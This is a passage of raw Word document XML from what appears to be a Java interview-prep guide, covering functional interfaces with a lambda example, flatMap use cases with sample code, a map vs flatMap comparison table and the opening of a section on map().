    </w:p>
    <w:p w14:paraId="7AC353F6" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422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y Use Functional Interfaces?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32790146" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732AC79" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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implifies </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>code readability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F9A31" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104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Promotes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> style in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579B036B" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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A8C86E7">
          <v:rect id="_x0000_i1725" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DF13DC" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422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with Lambda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3909BFA8"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460A56B0"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Greeting {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC82CB"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sayHello(String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16226BF5"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194510C" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F6184A"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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090ED469"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18F767A2"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Greeting greet = (name) -&gt; System.out.println("Hello, " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F8120"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greet.sayHello("Siddhant");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13198936"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5B19543" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422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12600A9" w14:textId="0E04541E" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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C9B5479">
          <v:rect id="_x0000_i1726" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C849D3B" w14:textId="77777777" w:rsidR="00A41943" w:rsidRPr="00CE4B95" w:rsidRDefault="00A41943">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="_Toc196307715"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Where can you use FlatMap in a stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w14:paraId="6BC93A0E" w14:textId="097CEB49" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ere Can You Use flatMap() in Java Streams?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C512BF" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A2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flatMap() is used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flatten nested structures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as a List&lt;List&lt;T&gt;&gt;, into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single stream of elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Stream&lt;T&gt;). It’s very useful in scenarios where each element in a stream produces </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CF3F1" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003E1A2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2E5B492">
          <v:rect id="_x0000_i1727" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED73421" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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Use Cases for flatMap()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F785B7" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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lattening Nested Collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1B25E" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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List&lt;String&gt;&gt; namesList = Arrays.asList(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B4A7C7" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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rrays.asList("A", "B"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9538CA" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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rrays.asList("C", "D")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B05967" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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D628ADA" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08759D26" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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String&gt; flatList = namesList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231A6704" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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latMap(List::stream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EEBE5F" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A2C03" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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Output: [A, B, C, D]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31473F57" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ocessing List of Objects that Contain Lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555B4B0" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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Student {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140193BD" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D7E4C" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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ist&lt;String&gt; subjects;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32EBC6" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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onstructor + getter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228BCD51" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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85073B7" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717424C5" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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Student&gt; students = ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB38BFC" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760E041B" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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String&gt; allSubjects = students.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C07D8B" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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latMap(s -&gt; s.getSubjects().stream())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9CE92D" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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istinct()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AA5F95" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2190E6" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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plitting and Flattening Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0A31E" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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String&gt; sentences = Arrays.asList("Java 8", "is awesome");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713E8E63" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E959AA" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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String&gt; words = sentences.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E217F3D" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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latMap(sentence -&gt; Arrays.stream(sentence.split(" ")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B0EA5" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570D8E5B" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:ind w:left="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Output: [Java, 8, is, awesome]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B1EA9" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003E1A2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14D0AA7">
          <v:rect id="_x0000_i1728" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31741EEC" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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How map() vs flatMap() Wor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7"/>
        <w:gridCol w:w="1041"/>
        <w:gridCol w:w="1917"/>
      </w:tblGrid>
      <w:tr w:rsidR="002240EB" w:rsidRPr="00CE4B95" w14:paraId="6358643E" w14:textId="77777777" w:rsidTr="00313557">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ED3224B" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A2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peration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14D779EE" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A2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put Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296D5B68" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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 Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002240EB" w:rsidRPr="00CE4B95" w14:paraId="44BD859F" w14:textId="77777777" w:rsidTr="00313557">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="510A98F5" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A2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p()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E9AC134" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A2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eam&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31F2A555" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A2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eam&lt;Stream&lt;R&gt;&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002240EB" w:rsidRPr="00CE4B95" w14:paraId="5A139595" w14:textId="77777777" w:rsidTr="00313557">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35BBF323" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A2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latMap()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066B5F68" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A2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eam&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6037DC84" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A2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eam&lt;R&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C5E68F8" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003E1A2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39E5255">
          <v:rect id="_x0000_i1729" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDC4E5" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A72DA8" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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flatMap() when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F3CCD" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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re dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nested structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C7C35" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Each element produces </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D5E122" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flatten</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them into a single stream for further processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71349857" w14:textId="66FE3D96" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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915738A">
          <v:rect id="_x0000_i1730" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3645BE52" w14:textId="77777777" w:rsidR="009E69C4" w:rsidRPr="00CE4B95" w:rsidRDefault="009E69C4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="_Toc196307716"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use map method in java 8 stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
    </w:p>
    <w:p w14:paraId="2296832E" w14:textId="3DA0B460" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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at Is the Use of map() Method in Java 8 Stream?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03332F57"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map() method in Java 8 Stream API is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each element of the stream into another form. It takes a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
